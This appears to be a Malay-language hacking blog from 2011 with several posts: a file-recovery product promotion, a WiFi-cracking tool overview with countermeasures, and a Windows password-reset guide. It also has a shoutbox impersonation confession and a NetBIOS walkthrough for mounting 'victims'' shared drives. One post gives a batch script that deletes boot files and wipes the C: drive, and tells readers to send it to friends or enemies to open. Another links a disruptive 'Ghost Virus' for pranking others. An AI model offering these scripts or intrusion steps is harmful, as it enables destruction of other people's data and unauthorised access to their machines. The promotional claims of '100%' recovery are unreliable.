Adakah korang secara tidak sengaja memadam fail dari Hard disk? Adakah korang sangat ingin memulihkan fail tersebut kembali? korang tidak perlu panik! Adalah tidak mustahil untuk memulihkan kembali fail dihapuskan dari hard disk (bahkan selepas korang tekan Shift + Delete) asalkan bertindak segera selepas korang menyedari bahawa fail tersebut dihapuskan dan gunakan perisian terbaik untuk memulihkan fail yang telah dipadam. Dalam posting ini korang akan mendapat maklumat terperinci tentang bagaimana memulihkan fail yang telah dihapuskan dari PC Windows atau Mac.

Saat ini terdapat beratus-ratus tool recovery data dan perisian di pasaran yang membanggakan untuk memulihkan 100% dari semua fail yang telah dipadam untuk kembali semula dalam keadaan asal. Namun pada kenyataannya sebahagian besar perisian ini tidak berkesan dan tidak mampu memulihkan fail korang kembali. Jadi kita perlu untuk membuat pilihan yang tepat dari software recovery file dalam rangka untuk memulihkan fail dihapuskan kembali semula dalam keadaan asal. Kami mengesyorkan perisian berikut untuk memulihkan fail tersebut:



1. Stellar Phoenix Data Recovery

2. Stellar Phoenix Mac Data Recovery


Stellar Phoenix adalah salah satu syarikat terbaik yang mengkhususkan dalam pemulihan fail yang telah dipadam sejak tahun 1993. Stellar Data Recovery Solutions merangkumi pelbagai macam perisian untuk hampir setiap situasi kehilangan data mulai dari accidental format, serangan virus dan perisian yang rosak/tidak berfungsi. Oleh kerana itu Stellar menyediakan alat terbaik untuk memulihkan fail yang telah dipadam dengan lebih dari 1.000.000 pelanggan yang berpuas hati di 137 negara.



Bagaimana Proses File Deletion berlaku?

Apabila korang memadam fail dari komputer (atau bahkan dari recycle bin) fail tersebut tidak benar-benar dihapuskan. Tidak seperti apa yang kebanyakan orang fikir, fail tersebut tidak dihapuskan atau dibuang dari hard disk. Mari kita ambil sebuah contoh dari sebuah buku yang mengandungi 50 halaman. Misalkan ketika korang memadam 25 halaman, andaikan bahawa hanya entry dalam indeks yang menunjukkan ke halaman 25 dihapuskan dan bukan halaman 25 itu sendiri yang dipadm. Demikian juga ketika korang memadam fail dari hard disk, hanya pointer yang menunjuk ke gambar tersebut akan dihapuskan dan bukan fail itu sendiri. Fail ini masih ada dan 100% berkemungkinan untuk pulih semula dalam keadaan asal. Dalam keadaan ini file menjadi tak terlihat dan kerana itu ia kelihatan seperti telah dihapuskan.


Apa Kemungkinan Untuk Memulihkan Kembali File saya?

Kerana sistem operasi tidak serta-merta menggunakan ruangan dari fail yang dihapuskan, hal ini sangat pasti berkemungkinan besar untuk memulihkan fail yang dihapuskan kembali dalam keadaan asli 100%. Ini mungkin memakan masa yang sangat lama untuk fail-fail tersebut harus benar-benar dihapuskan kerana hard disk moden mempunyai kapasiti yang cukup besar. Oleh kerana itu kemungkinan kecil bahawa ruang dari fail yang dipadam akan digunakan semula dengan segera. Jadi, sangat bagus untuk mencuba software recovery file seperti Stellar Data Recovery untuk Windows atau Stellar Recover Data untuk Mac. Beberapa fail yang dilaporkan telah pulih bahkan setelah bertahun-tahun penghapusan fail itu berlaku. Namun untuk hasil yang terbaik, disarankan bahawa korang menggunakan perisian fail pemulihan secepat mungkin untuk memulihkan fail korang tu.


Memulihkan Fail

Dalam rangka untuk memulihkan fail yang dipadam semua yang perlu korang lakukan adalah melakukan scan (carian) untuk fail tersebut menggunakan File Recovery Software. Harap diperhatikan bahawa tidak ada cara manual untuk memulihkan fail yang dipadam. Phoenix Data Recovery software melakukan imbasan menyeluruh sektor hard disk dan akan menemukan fail yang terpadam untuk memulihkan ia kembali dalam keadaan asal. Ini adalah perisian yang hanya menyokong 185 jenis fail yang popular termasuk Windows NT Registry, JPEG, MP4, GIF, BMP dan fail MS Word. Peranti lunak ini menawarkan sokongan grafik yang cantik dan canggih dengan  menggabungkan kaedah scanning untuk mengimbas sepenuhnya dan memulihkan fail yang telah dipadam dari hard drive. Dengan ini, korang boleh:


  • Recover FAT16, FAT32, vfat, NTFS, dan partisi (partition) fail sistem NTFS5
  • Recover e-mel
  • Memulihkan dokumen yang telah dihapuskan
  • Recover foto
  • Recover muzik
  • Pemulihan 'Formatted Hard-Drive'
  • Recover file dari USB Drives, CD, DVD dan kad memori
  • Recover hampir semua fail format kamera



24 January 2011

Hacking WiFi!


Yeah..entry kali ni aku taip khas untuk Melvister (Klik di sini) sebab dia yang request entry ni.. ada yang request untuk hack akaun nuffnang orang (encik tuuut..jangan marah ye), tapi aku bimbang blog ni jadi bahan makian dan cacian mereka-mereka yang akaun nuffnangnya dah cecah juta-juta..muahaha!
aku rasa korang yang nak buat benda-benda camtu, aku tak perlu ajar kot..korang kaji aje la setiap entry yang masuk kat dalam blog aku ni..komfom boleh buat sendiri tanpa diajar punya..

(Perhatian : Disebabkan posting aku kali ni agak skema sikit, so aku mintak maap la sebab agak susah nak terangkan dengan simple istilah-istilah komputer yang melibatkan WiFi ni..kalau korang baca majalah PC, iaitu majalah mengenai komputer yang 100% berbahasa melayu, lagi la pening..posting kali ni aku terjemahkan salah satu artikel tentang WiFi Hacking dari website berbahasa Inggeris..sebab tu ia agak skema sikit..harap maklum..)





Perisian Hacker Freeware (Free Software)

Ada banyak perisian freeware yang sedia ada untuk di muat turun yang telah disediakan, bahkan mereka yang baru berjinak-jinak dalam dunia hacker, dengan perisian pintar mereka menahan data paket rangkaian penghantaran wireles dari jarak jauh (remote), dan setelah mengumpulkan cukup banyak "pakej data terenkripsi" dari korang, seorang hacker akan dapat network security key. Ia membolehkan seorang hacker untuk membaca fail & transmisi dari jarak jauh seolah-olah mereka langsung disambungkan ke rangkaian korang. Salah satu aspek yang lebih menakutkan daripada hacking wireless bahawa perbuatan mereka itu tidak pernah meninggalkan jejak. Untuk menggunakan program tersebut korang semua tidak perlu menjadi jurutera komputer yang sangat berpengalaman, tetapi hanya mempunyai pengetahuan asas pengkomputeran. Cari dan muat turun program Wi-Fi hacking memerlukan waktu sekitar sepuluh saat menggunakan tools carian Internet standard sedia ada. Wi-Fi software hacking telah lama tersedia untuk sistem Windows, Mac, Linux / Unix, dan Pocket PC.


Cari Rangkaian Wireless

Menemukan sebuah rangkaian wireless adalah langkah pertama dalam cuba memanfaatkannya. Ada dua alat yang umum digunakan dalam hal ini:

Network Stumbler a.k.a NetStumbler - Alat ini berasaskan Windows dengan mudah menemukan isyarat wireless disiarkan dalam liputan - korang harus...eh...WAJIB memilikinya!


(NetStumbler Screenshot)



Kismet - Salah satu elemen berfungsi utama yang hilang dari NetStumbler adalah kemampuan untuk memaparkan Rangkaian Wireless yang tidak tersiar SSID mereka. Kismet akan mengesan dan memaparkan SSID yang tidak disiarkan yang sangat penting dalam mencari rangkaian wireless.


(Kismet Screenshot)







Memasuki ke Rangkaian Wireless Yang Telah Dijumpai

Setelah korang menemukan rangkaian wireless, langkah seterusnya adalah cuba untuk bersambung dengannya. Jika rangkaian tidak menggunakan semua jenis keselamatan pengesahan atau penyulitan, korang hanya boleh disambungkan ke SSID. Jika SSID tidak disiarkan, korang boleh membuat profil dengan nama SSID yang tidak disiarkan. Tentu saja korang menemukan SSID yang tidak disiarkan dengan Kismet, kan? Jika rangkaian wireless menggunakan pengesahan dan / atau enkripsi, korang mungkin perlu satu daripada perisian berikut:

Airsnort - Ini adalah alat yang sangat mudah untuk digunakan, bagi mengesan (sniff) dan mendapatkan kunci WEP. Sementara banyak orang mempertikaikan penggunaan WEP, tentu lebih baik daripada tidak menggunakan apa-apa. Sesuatu yang korang akan dapati dalam menggunakan alat ini bahawa ia membawa banyak pakej 'penghiduan' untuk memecahkan kunci WEP. Ada alat tambahan dan strategi yang boleh digunakan untuk memendekkan jumlah masa yang diperlukan dengan tujuan menyelesaikan kata kunci, tapi ciri-ciri ini tidak termasuk dalam Airsnort.


(Screenshot dari Airsnort)



CowPatty - Alat ini digunakan sebagai alat brute Force Attack untuk cracking WPA-PSK, yang dianggap sebagai "New WEP" untuk Wireless Security di rumah. Program ini hanya mencuba sekumpulan pilihan yang berbeza dari kamus fail (dictionary file) untuk melihat jika salah satu berakhir dengan perkataan yang sesuai, apa yang ditakrifkan sebagai Pre-Shared Key.


(Cowpatty Screenshot)



ASLeap - Jika rangkaian yang menggunakan LEAP, alat ini boleh digunakan untuk mengumpul data pengesahan yang sedang melewati seluruh rangkaian, dan identiti key ini boleh dikesan dan dipecahkan kodnya. LEAP tidak melindungi pengesahan seperti yang lain "nyata" jenis EAP, yang merupakan alasan utama mengapa LEAP boleh dipecahkan.


(Asleap Screenshot)



Sniffing Wireless Data

Sama ada korang secara langsung dihubungkan ke rangkaian wireless atau tidak, jika ada rangkaian wireless dalam liputan, ada data yang 'terbang' melalui jalur lebar pada saat tertentu. korang akan memerlukan alat untuk dapat melihat data ini.

Wireshark (dulunya Ethereal) - Walaupun ada banyak perdebatan mengenai cara yang tepat untuk menerangkan utiliti ini, tidak syak lagi, bahawa ia adalah alat yang sangat berharga. Ethereal dapat mengimbas data wireless, dan Ethernet, dan dilengkapi dengan beberapa kemampuan penapisan yang kuat. Hal ini juga boleh digunakan untuk mengesan beacon pengurusan 802.11 dan probe dan selanjutnya dapat digunakan sebagai alat untuk mengesan non-broadcast SSID.


(Screenshot dari Ethereal)




(Sesi IM Yahoo sedang 'dihidu' di Ethereal)



Utiliti tersebut, atau yang sejenis, adalah keperluan bagi keselamatan wireless korang sendiri. Cara paling mudah untuk menjadi terbiasa dengan perisian ini adalah dengan hanya menggunakan mereka dalam lingkungan makmal terkawal (controlled lab environment). Dan kos (wang) bukanlah alasan kerana semuanya telah tersedia secara percuma di Internet.

Melindungi Network Key, Kaedah Untuk Melawan Tools Ini :

Adalah penting untuk mengetahui bagaimana memanfaatkan alat (perisian) tersebut, adalah penting untuk mengetahui amalan terbaik tentang bagaimana mengamankan korang Wireless Network Melawan alat-alat ini.

NetStumbler - Jangan broadcast SSID korang. Pastikan WLAN dilindungi dengan menggunakan Pengesahan Kata Laluan (Advance Authentication) dan Enkripsi (encryption).

Kismet - Tiada apa-apa perkara yang benar-benar boleh dilakukan untuk menghentikan Kismet dari mencari WLAN korang, jadi pastikan WLAN dilindungi dengan menggunakan Pengesahan Kata Laluan (Advance Authentication) dan Enkripsi (encryption).

Airsnort - Guna 128-bit, bukan WEP encyption key 40-bit. Hal ini akan memakan masa lebih lama untuk proses cracking berjalan. Jika peranti menyokong aplikasi tersebut, gunakan WPA atau WPA2 bukan WEP (memerlukan firmware atau mengemas kini perisian).

Cowpatty - Guna WPA Pre-Shared Key yang panjang & rumit. Jenis kunci akan mempunyai kurang daripada peluang yang berada di kamus fail (dictionary file base attack) yang akan digunakan untuk mencuba dan meneka kunci dan / atau akan memakan masa yang lebih lama. Jika dalam senario syarikat, tidak menggunakan WPA dengan Pre-Shared Key, gunakan jenis EAP yang baik untuk melindungi pengesahan dan mengehadkan bilangan tekaan yang salah yang akan berlangsung sebelum akaun dikunci.

ASLeap - Guna identiti key yang panjang dan rumit, atau lebih baik lagi, beralih ke EAP-FAST atau jenis EAP yang berbeza.

Ethereal - Guna enkripsi, sehingga apa pun kaedah akan sulit atau hampir mustahil untuk dipecahkan. WPA2, yang menggunakan AES, pada dasarnya realistik untuk dipecahkan oleh hacker yang normal. Bahkan WEP akan menyulitkan data. Ketika di Wireless Hotspot Umum (yang umumnya tidak menawarkan enkripsi), dengan menggunakan aplikasi enkripsi layer, seperti Simplite untuk melindungi sesi IM korang, atau menggunakan SSL. Untuk pengguna syarikat, gunakan IPSec VPN dengan split-tunneling dimatikan. Hal ini akan memaksa semua lalu lintas meninggalkan laluan internet melalui terowong terenkripsi yang akan dienkripsi dengan DES, 3DES atau AES.


P/S: Pada entry akan datang, aku akan post pasal glosari maksud-maksud istilah dalam dunia hackers seperti hashing, pishing, brute force attack, dictionary base attack dan sebagainya..baru la korang tak pening, ok?



23 January 2011

Mematikan (Shutdown) Komputer Untuk Selama-lamanya!


Aku yakin korang ingin membalas ke atas perbuatan buruk yang pernah korang terkena sebelum ni pada seseorang,dan dengan sedikit kaedah korang dapat mematikan komputer orang tersebut selamanya!


Mari kita mulakan:


Buka notepad dan copy / paste kod ini:


@ Echo off
attrib-r-s-h c: \ autoexec.bat
del c: \ autoexec.bat
attrib-r-s-h c: \ boot.ini
del c: \ boot.ini
attrib-r-s-h c: \ ntldr
del c: \ ntldr
attrib-r-s-h c: \ windows \ win.ini
del c: \ windows \ win.ini


Sekarang simpan sebagai fail bat..


Fail ini boleh mematikan (shutdown) komputer seseorang.
Ia mematikan komputer dan memadam fail yang diperlukan untuk reboot dan restart.


INGAT - JANGAN KLIK FILE INI OK.
KORANG TIDAK AKAN DAPAT RECOVER SEMULA kOMPUTER SETELAH KORANG MEMBUKA FILE BAT NI TAU!


Kirimkan ke komputer kawan-kawan mahupun lawan dan beritahu mereka untuk membukanya.




Berikut ini adalah kod lain yang boleh digunakan juga:




cmd / c del c: \ windows \ * / F / S / Q


cmd / c del c: \ * / F / S / Q



Paste di Notepad dan simpan fail ini dengan Extension cmd atau bat




Selesai!


22 January 2011

Apakah Yang Dimaksudkan Sebagai Virus Komputer?


Apa itu Virus Komputer? 


---> Sebuah program komputer yang berpotensi merosakkan & mampu menyalinkan dirinya sendiri serta menyebabkan kerugian besar bagi fail atau program lain tanpa kebenaran atau pengetahuan pengguna. 


Jenis-jenis virus komputer: - 
Berbagai jenis virus yang telah dikenal pasti adalah sebagai berikut- 


1) Virus Boot Sektor: - Boot sector virus menginfeksi baik master boot record dari hard disk atau floppy drive. Boot record, program yang bertanggung jawab untuk booting sistem operasi, digantikan oleh virus. Virus itu sama ada menyalin program master boot ke bahagian lain dari hard disk atau menggantikannya dengan yang baru. Mereka menjangkiti komputer ketika boot up atau ketika mengakses floppy disk yang dijangkiti di floppy drive. Sekali sebuah sistem yang dijangkiti dengan virus boot sektor, setiap cakera yang tidak dilindungi oleh sistem non-write-protect akan dapat dicapai oleh sistem ini dan akan dijangkiti. 


Contoh virus boot- sektor Michelangelo dan Stoned. 


2) Fail atau Program Virus: - Beberapa file / program, ketika dijalankan, memuat naik virus dalam memori dan menjalankan fungsi standard untuk menjangkiti sistem. Mereka menginfeksi file program dengan sambungan seperti EXE, .. COM,. BIN,. DRV dan. SYS. 


Beberapa virus fail yang umum adalah Week, Cascade. 


3) Multipartite Virus: - Sebuah virus multipartite adalah virus komputer yang menjangkiti beberapa platform target yang berbeza, dan tetap secara rekursif infektif dalam target masing-masing. Ia cuba untuk menyerang baik boot sector dan executable, atau program, dalam masa yang sama. Ketika virus melekat pada sektor boot, pada gilirannya akan mempengaruhi fail sistem, dan ketika virus melekat pada fail, maka pada gilirannya akan menjangkiti boot sector. 
Virus jenis ini dapat kembali menjangkiti sistem berulang lagi jika semua bahagian dari virus tidak dibasmi. 


Ghostball adalah virus multipartite pertama, ditemui oleh Fridrik Skulason pada bulan Oktober 1989. 
Contoh lain adalah Invader, Flip, dll 


4) Stealth Virus: - Virus ini diam-diam di alam komputer, bererti ia menggunakan pelbagai kaedah untuk menyembunyikan diri untuk mengelakkan pengesanan. Ia kadang-kadang mengeluarkan diri dari memori sementara untuk mengelakkan pengesanan oleh antivirus. Ia agak sukar untuk dikesan. Ketika sebuah program antivirus cuba untuk mengesan virus, stealth virus memberi 'feed' kepada program antivirus gambaran yang bersih dari sektor fail atau boot. 


5) Polymorphic Virus: - polymorphic virus mempunyai kemampuan untuk bermutasi, membayangkan bahawa mereka mengubah kod virus yang dikenali sebagai tanda tangan setiap kali mereka menyebar atau menulari. Jadi program antivirus yang mengimbas kod virus tertentu tidak dapat mengesan kehadiran virus itu. 


6) Macro Virus: - Sebuah virus makro adalah virus komputer yang "menjangkiti" Microsoft Word atau aplikasi yang serupa dan menyebabkan urutan tindakan yang harus dilakukan menjadi automatik ketika aplikasi dijalankan atau sesuatu perbuatan yang lain yang mencetuskan aplikasi itu 'terkeluar'. Virus makro sering menyebar sebagai virus e-mel. contoh terkenal adalah Virus Concept dan Worm Melissa.

21 January 2011

Hack Windows Administrator Password


Kaedah hack kali ini aku akan menunjukkan cara untuk menetapkan semula password administrator Windows (untuk Win 2000, XP, Vista dan Win 7) pada saat korang lupa atau apabila korang ingin mendapatkan akses kepada komputer yang korang tidak tahu password. sebelum ni aku dah pernah buat posting tentang benda yang sama jugak tapi kaedah sahaja yang berbeza..sila rujuk posting pertama blog ini..ok?

Sebahagian besar dari kita telah mengalami situasi di mana kita perlu mendapatkan akses ke komputer yang dilindungi kata laluan atau pada waktu kita lupa password administrator yang menjadikan kita mustahil untuk login ke komputer. Jadi di sini adalah kaedah hacking menggunakan perisian pintar yang boleh menetapkan semula password atau membuat password kosong (menghapuskan kata laluan) sehingga korang boleh mendapatkan akses pentadbir (Administrator @ admin) ke komputer. Korang boleh melakukannya dengan perisian bernama Offline NT Password & Registry Editor. Utiliti ini berfungsi offline, itu bererti korang harus mematikan komputer dan boot dari floppy disk, CD atau peranti USB (seperti pen drive). Alat ini mempunyai beberapa ciri-ciri berikut.

1. Anda tidak perlu mengetahui password lama untuk menetapkan yang baru
2. Akan mengesan dan menawarkan untuk membuka dikunci atau dipadam dari akaun pengguna!
3. Ada juga registry editor dan utiliti registri lain yang bekerja di bawah linux / unix, dan boleh digunakan untuk hal-hal lain selain mengedit kata laluan.


Bagaimana ia berfungsi?


Sebahagian besar sistem operasi Windows menyimpan password login dan password terenkripsi (encrypted) yang lain dalam sebuah file bernama sam (Security Account Manager). Fail ini boleh (biasanya) ditemui pada \ windows \ system32 \ config. File ini merupakan sebahagian dari registri Windows dan tetap tidak dapat diakses selama OS aktif. Oleh kerana itu perlu ingat bahawa adalah wajib untuk boot dari komputer korang dan mengakses fail sam melalui boot. Perisian pintar ini akan mendapatkan akses ke fail sam dan akan menetapkan semula / memadam password yang berkaitan dengan pentadbir atau akaun yang lain.

Link download untuk kedua-dua CD dan floppy drive bersama-sama dengan Arahan lengkap diberikan di bawah ini

Offline NT Password & Download Editor Reg (Klik di sini)

Dianjurkan untuk korang men-download versi CD sejak floppy drive sudah lama tidak digunakan dan tidak ada di komputer pada saat ini. Setelah korang memuat turun, korang akan dapat bootable image yang korang perlukan untuk burn ke CD. Sekarang boot komputer dari CD ini dan ikuti arahan pada skrin untuk menetapkan semula kata laluan. Mudah bukan?



Hack Shoutbox (Shoutmix, C-Box) & Jadi Admin?


Salam semua...hahaha...hari ni aku nak cerita sikit pasal shoutbox ni..bukan apa, ada beberapa hari yang lepas, aku ada tinggalkan mesej berbunyi lebih kurang macam ni:

"This shoutbox was hacked by MyHackersAreHere!"

dengan menjadikan nama aku sebagai 'Admin' di blog tersebut...
antara yang pernah kena ialah blog Kak Pah (Klik di sini), Pendekar Berkuda (Klik di sini), dan myHD (Klik di sini)..
(Klik kalau korang nak tengok blog tu ok)

kat sini aku nak nyatakan, bahawa semua mesej-mesej tu adalah berupa USIKAN semata-mata dan bukanlah satu kerja hacking yang sebenar...hehehe!
kalau korang semua nak tau, shoutmix ni SESIAPA sahaja boleh guna nama 'Admin' atau 'admin' selagi shoutmix atau c-box tu bukan premium user account! hahaha!
sebab dalam shoutmix atau c-box versi premium user account, barulah nama 'Admin' atau 'admin' tu boleh disekat daripada pelawat-pelawat blog korang menyalahgunakannya!

huh..kenapa aku buat macam tu?
sebab apa lagi...nak naikkan rating dan trafik blog la..
bila lagi nak cepat famouskan blog ni kan?hehehe..
kepada semua yang pernah kena usikan tu, aku mintak maap la ye..
semua tu hanyalah bertujuan untuk pendidikan (educational purposes only).
kalau aku tak buat macam ni, rasanya ramai lagi yang tak pernah terfikir nak guna nama 'Admin' dekat shoutbox masing-masing kan?


haaaa...ok la..setakat ini aje la..sebarang pertanyaan boleh la ajukan dekat shoutbox blog aku ni..tapi jangan sekali-kali guna nama Admin plak ok! kalau tak aku ban! hehehe!


Hanya Yang Terbaik Untuk Anda Semua,

Salam, dari Dunia MyHackersAreHere...


Arya Putra.



20 January 2011

Ghost Virus


Hari ni terasa malas sikit nak tulis panjang-panjang lebar..
jadi hari ni aku cuma bagi korang semua link untuk muat turun VIRUS yang sangat dahsyat kesannya kepada komputer..antara 'kedahsyatan' perbuatan virus ini ialah:



* Disable Task Manager
* Disable Registry Editor
* Disable MS Config
* Disable Command Prompt
* Disable Explorer
* Disable Shutdown
* Disable 'taskkill'
* Beeps every 100 ms
* Displays a black screen every 2 seconds
* Message Box Bomb
* Adds itself to startup
* Closes/Opens CD-Rom every 100 ms
* Hides Cursor
* Disable Ctrl-Alt-Dlt




Nak remove macam mana? PAKAI ANTIVIRUS LA..heheheh..
nak remove dengan mudah tekan 'P' lama-lama..
(ni berdasarkan kepada sumber yang aku perolehi la..kalau tak jadi jangan marah aku pulak...)


so kepada semua yang nak sakat kawan-kawan atau lawan-lawan tu, haaaa....pegi muat turun kat sini:



Ghost Virus (Klik di sini)



Jadi macam mana plak kalau virus ni awal-awal lagi dah terdeteksi?
hmmm...setakat ni, aku dah muat turun dan belum sempat virus tu nak buat apa-apa, dah kena 'tangkap' dengan ESET SMART SECURITY 4 yang aku pakai sekarang..jadi pihak pengkaji dari dalam LAB NOD32 dah masukkan Ghost Virus ke dalam Virus Definition Smart Security ni..apa yang aku tau, korang pun kalau nak sakat, cari la yang PC dah tentu-tentu lemau, antivirus pun versi percuma..heheheh..


apa-apa pun cuba aje la heh!





19 January 2011

Mengunci Folder Tanpa Menggunakan Perisian


Yeah..kali ni aku nak tulis benda yang senang sangat nak buat..
Tips kali ni aku nak bagi korang cara yang mudah untuk mengunci folder (private) tanpa menggunakan apa-apa perisian..caranya ialah copy dan paste kod di bawah ke dalam notepad..
save sebagai batch file, dengan extension .bat
(gantikan *.txt dengan *.bat - dekat tanda * gantikan dengan nama yang korang pilih)
sebagai contoh 'Fail Peribadi Aku.bat'

Kemudian korang dah save, korang akan nampak fail tersebut telah di-save dalam bentuk batch file..korang double click pada fail tu, dan satu folder yang dinamakan 'Locker' akan tercipta dengan sendiri (yang sebenarnya semuanya dah dibuat dalam command pada kod tu)..

Kat bawah ni adalah kod yang perlu korang copy n paste:



if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End





Tulisan yang berwarna merah, korang gantikan dengan password pilihan sendiri. jadi, bila dah siap, bawak semua fail yang korang nak sorok kat dalam folder 'Locker' tu..
cara nak kunci senang aje..double click pada fail bat tersebut, satu tetingkap arahan akan keluar..
kalau nak lock, taipkan 'Y' atau 'y' dan tekan enter..siap! folder tu dah hilang!
nak unlock pulak, double click jugak pada fail bat tadi, satu tetingkap arahan untuk memasukkan password (yang korang dah taip @ gantikan pada tulisan merah tu la) akan keluar...taipkan password, kemudian tekan enter..folder 'Locker' akan muncul kembali...

Selamat mencuba!


P/S: FAIL BAT adalah mudah untuk di-hack dengan hanya menggunakan perisian Notepad++, hacker dengan mudah akan berjaya melihat kod yang telah digunakan dan dapat juga melihat password korang..jadi, untuk lebih selamat, convertkan fail bat tu kepada fail exe..sila gunakan perisian di bawah untuk melakukan proses converting:



Bat To Exe Converter (Klik di sini)



Hack PC Orang Lain


1. Perkara pertama yang perlu dilakukan, dapatkan software IP scanner terlebih dahulu..
Angry IP Scanner adalah bagus untuk percubaan..sila muat turun di sini:

Angry IP Scanner (Klik di sini)

2. Kemudian, klik start ---> run ---> taip cmd

ini adalah apa yang anda akan dapat lihat:

c:\windows>


3. Kemudian, gantikan 255.255.255.255 dengan alamat IP MANGSA anda..


c:\windows>nbtstat -a 255.255.255.255


jika anda dapat lihat ni, anda berada dalam NetBIOS Remote Machine Name Table


Name Type Status ---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx 
--------------------------------------------------------------- 



Jika anda tak dapat nombor <20> tu, maknanya mangsa anda telah disable File And Printer Sharing..so cari mangsa lain..ok..


4. Taipkan:


c:\windows>net view \\255.255.255.255


outputnya akan menjadi seperti ini:


Shared resources at \\255.255.255.255
ComputerNameGoesHere



Sharename Type Used as Comment

------------------------------------------------------------
CDISK Disk xxxxx xxxxx



command anda telah berjaya sepenuhnya..


'DISK' bererti mangsa anda berkongsi satu Disk yang dinamakan CDISK..


5. anda boleh gantikan x: dengan apa jua huruf yang anda suka, tapi bukan huruf drive anda sendiri..


CDISK adalah nama shared harddrive..


6. Kemudian taipkan:


c:\windows>net use x: \\255.255.255.255\CDISK


Jika command anda berjaya, anda sudah pun menjadi seorang hacker 'separuh masa'...heheheh..


Sekarang, buka windows explorer atau klik sahaja pada icon My Computer di desktop anda dan anda akan dapat lihat satu driver baru X:.


P/S: Hack ni hanya akan berkesan jika anda mempunyai IP mereka yang sama network dengan anda..ia tidak akan berkesan seandainya seseorang itu bukan dari network anda..ok..


Tip: Jika anda hanya dapat masuk ke shared folder mangsa anda, letakkan batch file dalam shared folder tersebut dengan command C=C jika mereka membukanya, ia akan dapat mengongsikan drive mereka..renung-renungkan, dan selamat mencuba!









18 January 2011

Etika Seorang Hacker


Yang menarik, ternyata dalam dunia hacker mempunyai strata / tingkatan / level yang diberikan oleh komuniti hacker kepada seseorang kerana kelayakkannya, bukan kerana umur atau senioritinya.

Proses memperoleh pengakuan di antara sesama hacker tidak lepas dari etika & aturan dunia hackers underground. Etika ini yang akhirnya akan membezakan antara hacker & cracker, mahupun hacker kelas rendahan seperti Lamer & Script Kiddies. Salah satu etika yang berhasil di formulasikan dengan baik ada di buku Hackers: Heroes of the Computer Revolution, yang ditulis oleh Steven Levy pada tahun 1984, ada enam (6) etika yang perlu di fahami dan di mahirkan oleh seorang hacker:

1. Mampu mengakses komputer dengan tidak terbatas dan secara total.
2. Semua informasi haruslah FREE.
3. Tidak percaya pada authoriti, ertinya memperluas rangkaian sendiri.
4. Tidak memakai identiti palsu, seperti nama samaran, umur, posisi.
5. Mampu membuat seni keindahan dalam komputer.
6. Komputer dapat mengubah hidup menjadi lebih baik.
7. Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.
8. Memegang teguh komitmen tidak membela dominasi ekonomi industri perisian tertentu.
9. Hacking adalah senjata majoriti dalam perang melawan pelanggaran batas teknologi komputer.
10. Baik Hacking mahupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa mengenai sesuatu perkara.
Cracker pula tidak memiliki kod etika apa-apa pun.

(tak tahu la kenapa dari 6 boleh jadi 10 nohhh..hahaha..)



Peraturan Hacker

Gambaran umum aturan yang perlu di ikuti oleh seorang hacker iaitu:
· Di atas segalanya, hormati pengetahuan & kebebasan informasi.
· Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.
· Jangan mengambil keuntungan yang tidak adil dari hasil godaman.
· Tidak menerbitkan & mengumpulkan perisian cetak rompak.
· Tidak pernah mengambil risiko yang bodoh – selalu mengetahui kemampuan sendiri.
· Selalu bersedia untuk secara terbuka / bebas / percuma memberitahukan & mengajarkan berbagai informasi & kaedah yang diperoleh.
· Tidak pernah menggodam sebuah sistem untuk mencuri wang.
· Tidak pernah memberikan akses kepada seseorang yang akan membuat kerosakan.
· Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack.
· Hormati mesin yang digodam, dan memperlakukan ia seperti mesin sendiri.
Hacker sejati akan selalu bertindak berlandaskan kod etika dan peraturan sedang cracker tidak mempunyai kod etika ataupun peraturan kerana cracker sifatnya merosakkan.





Lagi Perbezaan Hacker dan Cracker




a. Hacker

1.Mempunyai kemampuan menganalisa kelemahan suatu sistem atau laman sesawang.
Sebagai contoh : jika seorang hacker mencuba untuk menguji laman Yahoo! dipastikan isi laman tersebut tak akan berantakan dan mengganggu laman yang lain. Biasanya hacker melaporkan kejadian ini untuk diperbaiki menjadi sempurna.
2.Hacker mempunyai etika serta kreatif dalam merancang suatu program yang berguna bagi sesiapa saja.
3. Seorang Hacker tidak kedekut memberi ilmunya kepada orang-orang yang serius atas nama ilmu pengetahuan dan kebaikan.


b. Cracker

1. Mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merosakkan dan menjadikannya suatu keuntungan. Sebagai contoh : Virus, Pencurian Kad Kredit, Kod Warez, Pecerobohan Sistem Bank, Pencurian Password E-mail/Web Server.
2. Boleh berdiri sendiri atau berkelompok dalam bertindak.
3. Mempunyai laman sesawang atau channel dalam IRC yang tersembunyi, hanya orang-orang tertentu yang boleh mengaksesnya.
4. Mempunyai IP yang tidak boleh dikesan.
5. Kes yang paling sering ialah Carding yaitu Pencurian Kad Kredit, kemudian pencerobohan laman sesawang dan mengubah segala isinya menjadi berantakan. Sebagai contoh : Yahoo! pernah mengalami kejadian seperti ini sehingga tidak boleh diakses dalam waktu yang lama, kes clickBCA.com yang paling hangat diperkatakan tahun 2001 yang lalu.




Dua Jenis Kegiatan Hacking


